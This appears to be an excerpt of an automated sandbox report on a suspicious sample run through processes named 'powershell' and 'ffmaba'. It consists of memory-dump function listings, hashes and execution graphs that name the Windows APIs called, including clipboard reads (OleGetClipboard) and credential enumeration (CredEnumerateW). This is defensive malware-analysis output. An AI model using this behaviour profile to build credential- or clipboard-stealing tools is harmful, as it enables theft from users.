                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$pij$J!l$J!l
                                                                            • API String ID: 0-1243686353
                                                                            • Opcode ID: cd52c65da46119941328a4d2b5835ad920a92bcfe290db17bc785e95b3c5ae91
                                                                            • Instruction ID: 4b4be9dbf74a24f6d6eb76b5a8d4c2352c24c92c540088f46ed7602e5d8bf9b6
                                                                            • Opcode Fuzzy Hash: cd52c65da46119941328a4d2b5835ad920a92bcfe290db17bc785e95b3c5ae91
                                                                            • Instruction Fuzzy Hash: 6E3106F1904306DFDB22CF25C1606A5BBF0FF41210F6880A6F80ACB251C735D985CB91
                                                                            Function 07640308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq
                                                                            • API String ID: 0-1126079151
                                                                            • Opcode ID: b6de20df5ca66eab452b3ee885b8d74c46d02e8aae4acd47fb459fbb4031632b
                                                                            • Instruction ID: 2174790603254eb7a7fed30cc5e864515964c3f133bec215b00117c4aed0cfd8
                                                                            • Opcode Fuzzy Hash: b6de20df5ca66eab452b3ee885b8d74c46d02e8aae4acd47fb459fbb4031632b
                                                                            • Instruction Fuzzy Hash: 8801A7A17197979FDB3712285C21166BFB3AFC360075940E7C542CB297CE248C4687A7
                                                                            Function 07642108 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$J!l$J!l
                                                                            • API String ID: 0-2426129395
                                                                            • Opcode ID: 1cf36dd46893868118a933cd63f37a219fb6a00748e139cdf711c062632d5777
                                                                            • Instruction ID: 9ceaa0c13f61d9ab72dfb9dae17018f801404a674c142470662c2204cc837043
                                                                            • Opcode Fuzzy Hash: 1cf36dd46893868118a933cd63f37a219fb6a00748e139cdf711c062632d5777
                                                                            • Instruction Fuzzy Hash: 6401FCB161D3865FD72742284C31053BFF2AFD361076A41A7E685EF297D6344C45C366

                                                                            Execution Graph

                                                                            Execution Coverage:7.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:58
                                                                            Total number of Limit Nodes:3
                                                                            execution_graph 25462 274d740 25463 274d786 25462->25463 25466 274d920 25463->25466 25469 274d2d0 25466->25469 25470 274d988 DuplicateHandle 25469->25470 25471 274d873 25470->25471 25472 274b740 25473 274b754 25472->25473 25474 274b779 25473->25474 25476 274aeb0 25473->25476 25477 274b920 LoadLibraryExW 25476->25477 25479 274b999 25477->25479 25479->25474 25480 4ca455f 25481 4ca464c 25480->25481 25482 4ca45a2 25480->25482 25484 4ca141c CallWindowProcW 25481->25484 25483 4ca45fa CallWindowProcW 25482->25483 25485 4ca45a9 25482->25485 25483->25485 25484->25485 25429 274b698 25430 274b6e0 GetModuleHandleW 25429->25430 25431 274b6da 25429->25431 25432 274b70d 25430->25432 25431->25430 25486 2744668 25487 2744672 25486->25487 25489 2744759 25486->25489 25490 2744768 25489->25490 25494 2744867 25490->25494 25498 2744868 25490->25498 25496 274488f 25494->25496 25495 274496c 25495->25495 25496->25495 25502 27444b4 25496->25502 25499 274488f 25498->25499 25500 27444b4 CreateActCtxA 25499->25500 25501 274496c 25499->25501 25500->25501 25503 27458f8 CreateActCtxA 25502->25503 25505 27459bb 25503->25505 25433 d1d01c 25434 d1d034 25433->25434 25435 d1d08e 25434->25435 25440 4ca2148 25434->25440 25444 4ca2eb7 25434->25444 25448 4ca2137 25434->25448 25452 4ca141c 25434->25452 25441 4ca216e 25440->25441 25442 4ca141c CallWindowProcW 25441->25442 25443 4ca218f 25442->25443 25443->25435 25445 4ca2ee5 25444->25445 25447 4ca2f09 25445->25447 25456 4ca1544 CallWindowProcW 25445->25456 25449 4ca216e 25448->25449 25450 4ca141c CallWindowProcW 25449->25450 25451 4ca218f 25450->25451 25451->25435 25453 4ca1427 25452->25453 25455 4ca2f09 25453->25455 25457 4ca1544 CallWindowProcW 25453->25457 25456->25447 25457->25455 25458 4ca1f84 25459 4ca1ff8 CreateWindowExW 25458->25459 25461 4ca20b4 25459->25461

                                                                            Executed Functions

                                                                            Function 04CA13F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1435 4ca13f0-4ca1ff6 1437 4ca1ff8-4ca1ffe 1435->1437 1438 4ca2001-4ca2008 1435->1438 1437->1438 1439 4ca200a-4ca2010 1438->1439 1440 4ca2013-4ca204b 1438->1440 1439->1440 1441 4ca2053-4ca20b2 CreateWindowExW 1440->1441 1442 4ca20bb-4ca20f3 1441->1442 1443 4ca20b4-4ca20ba 1441->1443 1447 4ca2100 1442->1447 1448 4ca20f5-4ca20f8 1442->1448 1443->1442 1449 4ca2101 1447->1449 1448->1447 1449->1449
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04CA20A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2267191163.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_4ca0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID: l$l
                                                                            • API String ID: 716092398-3124565592
                                                                            • Opcode ID: ab7060cfc72bb3e14d2a20fd43a611f1a7daa12453f7139e163963b2514b73f4
                                                                            • Instruction ID: b73838df68d2677e2f0cbee815640c6ee4e1c9c2c7b27cc47e9a6768cc87abfa
                                                                            • Opcode Fuzzy Hash: ab7060cfc72bb3e14d2a20fd43a611f1a7daa12453f7139e163963b2514b73f4
                                                                            • Instruction Fuzzy Hash: 4F51E0B1D10319DFDB14CF99C884ADEBBB6FF48314F24816AE818AB210D771A841CF90
                                                                            Function 04CA1F84 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1450 4ca1f84-4ca1ff6 1451 4ca1ff8-4ca1ffe 1450->1451 1452 4ca2001-4ca2008 1450->1452 1451->1452 1453 4ca200a-4ca2010 1452->1453 1454 4ca2013-4ca20b2 CreateWindowExW 1452->1454 1453->1454 1456 4ca20bb-4ca20f3 1454->1456 1457 4ca20b4-4ca20ba 1454->1457 1461 4ca2100 1456->1461 1462 4ca20f5-4ca20f8 1456->1462 1457->1456 1463 4ca2101 1461->1463 1462->1461 1463->1463
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04CA20A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2267191163.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_4ca0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID: l$l
                                                                            • API String ID: 716092398-3124565592
                                                                            • Opcode ID: 7c73beddc01d265de487743b6114b5fbae6aa4c0554cc2f7537234c38e73b0ff
                                                                            • Instruction ID: 164c383aa33e32ab8e8a14818fabb560a12b77c1b82a3d7f4c387b2a04065105
                                                                            • Opcode Fuzzy Hash: 7c73beddc01d265de487743b6114b5fbae6aa4c0554cc2f7537234c38e73b0ff
                                                                            • Instruction Fuzzy Hash: 6B51F2B1C00319DFDB14CF99C884ADDBBB2BF48314F24812AE818AB210D771A945CF90
                                                                            Function 04CA1544 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1486 4ca1544-4ca459c 1489 4ca464c-4ca466c call 4ca141c 1486->1489 1490 4ca45a2-4ca45a7 1486->1490 1498 4ca466f-4ca467c 1489->1498 1491 4ca45fa-4ca4632 CallWindowProcW 1490->1491 1492 4ca45a9-4ca45e0 1490->1492 1494 4ca463b-4ca464a 1491->1494 1495 4ca4634-4ca463a 1491->1495 1500 4ca45e9-4ca45f8 1492->1500 1501 4ca45e2-4ca45e8 1492->1501 1494->1498 1495->1494 1500->1498 1501->1500
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04CA4621
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2267191163.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_4ca0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID: l
                                                                            • API String ID: 2714655100-1830764883
                                                                            • Opcode ID: 099a284fdcd45808759488a08b2ff26aecee524f77553d5de0183f34331591f5
                                                                            • Instruction ID: 67d456b3c2baf710bcbbb3b6cfde8af07c53c897316d25c68594ba4e1d09b24a
                                                                            • Opcode Fuzzy Hash: 099a284fdcd45808759488a08b2ff26aecee524f77553d5de0183f34331591f5
                                                                            • Instruction Fuzzy Hash: 78413BB9900205DFDB14CF99C448AAAFBF6FB88314F18C459D50967321D374A940CFA4
                                                                            Function 027444B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1503 27444b4-27459b9 CreateActCtxA 1506 27459c2-2745a1c 1503->1506 1507 27459bb-27459c1 1503->1507 1514 2745a1e-2745a21 1506->1514 1515 2745a2b-2745a2f 1506->1515 1507->1506 1514->1515 1516 2745a40 1515->1516 1517 2745a31-2745a3d 1515->1517 1519 2745a41 1516->1519 1517->1516 1519->1519
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 027459A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: l
                                                                            • API String ID: 2289755597-1830764883
                                                                            • Opcode ID: 8cdff9e5b547589cdcfb6119b02aebbd603a61d1f466232c1d28207bd3d251fe
                                                                            • Instruction ID: 7aa538e097503693a3e04b73e7a4e0ece3fbf374cdfdd2929a6cd7ebf88f52d4
                                                                            • Opcode Fuzzy Hash: 8cdff9e5b547589cdcfb6119b02aebbd603a61d1f466232c1d28207bd3d251fe
                                                                            • Instruction Fuzzy Hash: B941D1B0D00719CBDB24DFA9C944B9EBBF6BF48304F60806AD408AB251DB756949CF90
                                                                            Function 027458F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1520 27458f7-27459b9 CreateActCtxA 1522 27459c2-2745a1c 1520->1522 1523 27459bb-27459c1 1520->1523 1530 2745a1e-2745a21 1522->1530 1531 2745a2b-2745a2f 1522->1531 1523->1522 1530->1531 1532 2745a40 1531->1532 1533 2745a31-2745a3d 1531->1533 1535 2745a41 1532->1535 1533->1532 1535->1535
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 027459A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: l
                                                                            • API String ID: 2289755597-1830764883
                                                                            • Opcode ID: 35168aaf42adfa5d23469db59d2bead73154a84e38c6b5c892201c6a9eccb87f
                                                                            • Instruction ID: 1558281f8ba4020f7279d5b0d4d344528bc67fb78893ea05d9d23896043c8e7f
                                                                            • Opcode Fuzzy Hash: 35168aaf42adfa5d23469db59d2bead73154a84e38c6b5c892201c6a9eccb87f
                                                                            • Instruction Fuzzy Hash: 0541D0B0D00719CFDB24CFA9C984B9EBBF6BF49304F20816AD408AB255DB756949CF90
                                                                            Function 0274D2D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1536 274d2d0-274da1c DuplicateHandle 1538 274da25-274da42 1536->1538 1539 274da1e-274da24 1536->1539 1539->1538
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D94E,?,?,?,?,?), ref: 0274DA0F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID: l
                                                                            • API String ID: 3793708945-1830764883
                                                                            • Opcode ID: b2029d1369c694d955e48b1370e1ae41d17a451a04cde175239e90c15b3800f4
                                                                            • Instruction ID: 1051ce4c1362543ea24824ef507c090c12230f99857e73861cfade52ad791b5e
                                                                            • Opcode Fuzzy Hash: b2029d1369c694d955e48b1370e1ae41d17a451a04cde175239e90c15b3800f4
                                                                            • Instruction Fuzzy Hash: F921E5B59102489FDB10CFAAD984AEEBBF4FB48310F14845AE954B7310D374A940CFA5
                                                                            Function 0274AEB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1542 274aeb0-274b960 1544 274b962-274b965 1542->1544 1545 274b968-274b997 LoadLibraryExW 1542->1545 1544->1545 1546 274b9a0-274b9bd 1545->1546 1547 274b999-274b99f 1545->1547 1547->1546
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0274B779,00000800,00000000,00000000), ref: 0274B98A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: l
                                                                            • API String ID: 1029625771-1830764883
                                                                            • Opcode ID: 9b21b2f23c64f8dc48eace75a5f6d738cb8d7ac9a61489e93725e38415bfc4a1
                                                                            • Instruction ID: c342a8121dcf3aff88e99992368d8d61c7f40227ebc9096de14bed7e5a7fc209
                                                                            • Opcode Fuzzy Hash: 9b21b2f23c64f8dc48eace75a5f6d738cb8d7ac9a61489e93725e38415bfc4a1
                                                                            • Instruction Fuzzy Hash: AA1114B6D00209DFDB10CFAAC444AAEFBF4EB48314F10842AD519B7200C775A944CFA5
                                                                            Function 0274B698 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0274B6FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: l
                                                                            • API String ID: 4139908857-1830764883
                                                                            • Opcode ID: 944d18e3079742bf3c1bdcd5c48730f60ec85c824bc91b7d902549e18141c6d2
                                                                            • Instruction ID: 46643ccf9a3c43d22dbaf27e64b30b32d1753d04b6be3228095baafbee42f34b
                                                                            • Opcode Fuzzy Hash: 944d18e3079742bf3c1bdcd5c48730f60ec85c824bc91b7d902549e18141c6d2
                                                                            • Instruction Fuzzy Hash: 3B11E3B6C00249CFCB10CF9AD944ADEFBF4EB88324F14845AD419A7610D375A545CFA5
                                                                            Function 00D0D1FC Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2251513900.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d0d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 48f96a6087095f8b723cfd0b1918a8b3ed631bd179e526f47538b0ed8848d81d
                                                                            • Instruction ID: 9814b2db4419e1e3f394c8e3dac80a43caf8825fd753f70340f5b481a0700a14
                                                                            • Opcode Fuzzy Hash: 48f96a6087095f8b723cfd0b1918a8b3ed631bd179e526f47538b0ed8848d81d
                                                                            • Instruction Fuzzy Hash: 3021F871504240DFDB05DFA4D9C4B26BF66FB98320F24C56AED490B286C336D816CBB5
                                                                            Function 00D1D1D4 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2253463184.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d1d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6449c0b6efe3d7911abcb22558199e4aaf241b924363be300005a1b1db331eab
                                                                            • Instruction ID: ba87c9698ca37868e76c55a7404da58d8edd942d6ff3073253410829aa43c4d0
                                                                            • Opcode Fuzzy Hash: 6449c0b6efe3d7911abcb22558199e4aaf241b924363be300005a1b1db331eab
                                                                            • Instruction Fuzzy Hash: FE212971604200FFDB05DF54E9C0B66BBA6FB84314F34C66DD8494B256C73AD886CA75
                                                                            Function 00D1D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2253463184.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d1d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b2ed18c4e0e52b0907d08be2bd47abbf3a12cdf3725889cc8a120ac6f388901
                                                                            • Instruction ID: 2da694c5daacc2d1cf219400edce848aac48d09103a2f27a6b7e3c20e8edd429
                                                                            • Opcode Fuzzy Hash: 8b2ed18c4e0e52b0907d08be2bd47abbf3a12cdf3725889cc8a120ac6f388901
                                                                            • Instruction Fuzzy Hash: 22210775504200EFCB15DF14E9C4B56BB66FB88314F24C56DE8494B286C73BD887CA71
                                                                            Function 00D1D005 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2253463184.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d1d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d79f1a6825a48840bfdc687e565973e7d098b00c095d9fc780549982fa648730
                                                                            • Instruction ID: 21a4424600ccd9f2f2cabd909369f91f7df14e86aa6b03522e6236b77c5a1767
                                                                            • Opcode Fuzzy Hash: d79f1a6825a48840bfdc687e565973e7d098b00c095d9fc780549982fa648730
                                                                            • Instruction Fuzzy Hash: A02195755093C09FC702CF24D594715BF71EB46314F28C5DAD8498F2A7C33A984ACB62
                                                                            Function 00D0D1F7 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2251513900.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d0d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                                            • Instruction ID: 163ed36557cd34a62f5286687c58a766081bbd942871782f1b6f46da3c02260a
                                                                            • Opcode Fuzzy Hash: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
                                                                            • Instruction Fuzzy Hash: 6E21B176504240DFDB06CF54D9C4B56BF72FB84324F28C5AADD090B696C33AD82ACBA1
                                                                            Function 00D1D1CF Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2253463184.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d1d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 12d3b5b0fb99c67a20db0bd60bfa2c85339b2bcafb2a3ad9da74b1a14e982984
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: 7711DD75504280EFCB02CF14D5C4B15FBB2FB84314F28C6ADD8494B696C33AD84ACB61
                                                                            Function 00D0D759 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2251513900.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d0d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bea1147f3347e5def42429c6d29214fcd1a7465d937ec230c5487b26ca8716d5
                                                                            • Instruction ID: af6318f0262bd2797378a74a4c49128ca4a60d93462ae7e7e12d28bc10362522
                                                                            • Opcode Fuzzy Hash: bea1147f3347e5def42429c6d29214fcd1a7465d937ec230c5487b26ca8716d5
                                                                            • Instruction Fuzzy Hash: A501A7710043449AE7218A59DD84B66FFA9DF91330F2CC45BED4E4A2C6D379DC40CAB1
                                                                            Function 00D0D758 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2251513900.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_d0d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cbc7b64f6d2489075fed5e0a2ee801ae48680eec6f308d38534bf359084c091d
                                                                            • Instruction ID: 6dab507a1070fb66052c85bb8cb5a1f7eea7825de836df5a9c485960de40fa20
                                                                            • Opcode Fuzzy Hash: cbc7b64f6d2489075fed5e0a2ee801ae48680eec6f308d38534bf359084c091d
                                                                            • Instruction Fuzzy Hash: 39F06D72404344AEE7208A1ADD84B62FFA8EF91734F18C45BFD0D4E286C379AC44CAB1

                                                                            Execution Graph

                                                                            Execution Coverage:17.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:84
                                                                            Total number of Limit Nodes:6
                                                                            execution_graph 25246 6293738 25247 6293792 OleGetClipboard 25246->25247 25248 62937d2 25247->25248 25150 52c4668 25151 52c4672 25150->25151 25155 52c4759 25150->25155 25160 52c3e34 25151->25160 25153 52c468d 25156 52c477d 25155->25156 25164 52c4868 25156->25164 25168 52c4858 25156->25168 25161 52c3e3f 25160->25161 25163 52c7540 25161->25163 25176 52c7250 25161->25176 25163->25153 25165 52c488f 25164->25165 25166 52c496c 25165->25166 25172 52c44b4 25165->25172 25170 52c4868 25168->25170 25169 52c496c 25169->25169 25170->25169 25171 52c44b4 CreateActCtxA 25170->25171 25171->25169 25173 52c58f8 CreateActCtxA 25172->25173 25175 52c59bb 25173->25175 25177 52c725b 25176->25177 25180 52c7270 25177->25180 25179 52c770d 25179->25163 25181 52c727b 25180->25181 25184 52c72a0 25181->25184 25183 52c77e2 25183->25179 25185 52c72ab 25184->25185 25188 52c72d0 25185->25188 25187 52c78e5 25187->25183 25189 52c72db 25188->25189 25191 52c8ccb 25189->25191 25195 52cb378 25189->25195 25190 52c8d09 25190->25187 25191->25190 25199 52cd478 25191->25199 25203 52cd468 25191->25203 25207 52cb39f 25195->25207 25211 52cb3b0 25195->25211 25196 52cb38e 25196->25191 25200 52cd499 25199->25200 25201 52cd4bd 25200->25201 25234 52cd628 25200->25234 25201->25190 25205 52cd478 25203->25205 25204 52cd4bd 25204->25190 25205->25204 25206 52cd628 2 API calls 25205->25206 25206->25204 25208 52cb3b0 25207->25208 25214 52cb499 25208->25214 25209 52cb3bf 25209->25196 25213 52cb499 2 API calls 25211->25213 25212 52cb3bf 25212->25196 25213->25212 25215 52cb4b9 25214->25215 25216 52cb4dc 25214->25216 25215->25216 25222 52cb740 25215->25222 25226 52cb731 25215->25226 25216->25209 25217 52cb4d4 25217->25216 25218 52cb6e0 GetModuleHandleW 25217->25218 25219 52cb70d 25218->25219 25219->25209 25223 52cb754 25222->25223 25225 52cb779 25223->25225 25230 52caeb0 25223->25230 25225->25217 25228 52cb740 25226->25228 25227 52cb779 25227->25217 25228->25227 25229 52caeb0 LoadLibraryExW 25228->25229 25229->25227 25231 52cb920 LoadLibraryExW 25230->25231 25233 52cb999 25231->25233 25233->25225 25235 52cd635 25234->25235 25236 52cd66f 25235->25236 25238 52cd208 25235->25238 25236->25201 25239 52cd213 25238->25239 25240 52cdf80 25239->25240 25242 52cd334 25239->25242 25243 52cd33f 25242->25243 25244 52c72d0 2 API calls 25243->25244 25245 52cdfef 25244->25245 25245->25240 25249 52cd740 25250 52cd786 25249->25250 25253 52cd920 25250->25253 25256 52cd2d0 25253->25256 25257 52cd988 DuplicateHandle 25256->25257 25258 52cd873 25257->25258 25259 9678258 25261 96782a6 CredEnumerateW 25259->25261 25262 96782f2 25261->25262

                                                                            Executed Functions

                                                                            Function 096759B0 Relevance: 2.7, Strings: 1, Instructions: 1422COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LRcq
                                                                            • API String ID: 0-4134321033
                                                                            • Opcode ID: a4f2e4e646bd2822016dee86292becefd928981dbe406cbef636ffd1f263c795
                                                                            • Instruction ID: 52641682c65a17b5c23dc41ddf3e40e4c3af5f97d83d6c9be0ed20f5a67782e4
                                                                            • Opcode Fuzzy Hash: a4f2e4e646bd2822016dee86292becefd928981dbe406cbef636ffd1f263c795
                                                                            • Instruction Fuzzy Hash: F4F2AE74911229CFCB65DF68C988B99BBB6BF49301F1491E9E50DA7261DB30AEC1CF40
                                                                            Function 0967B0E8 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LRcq
                                                                            • API String ID: 0-4134321033
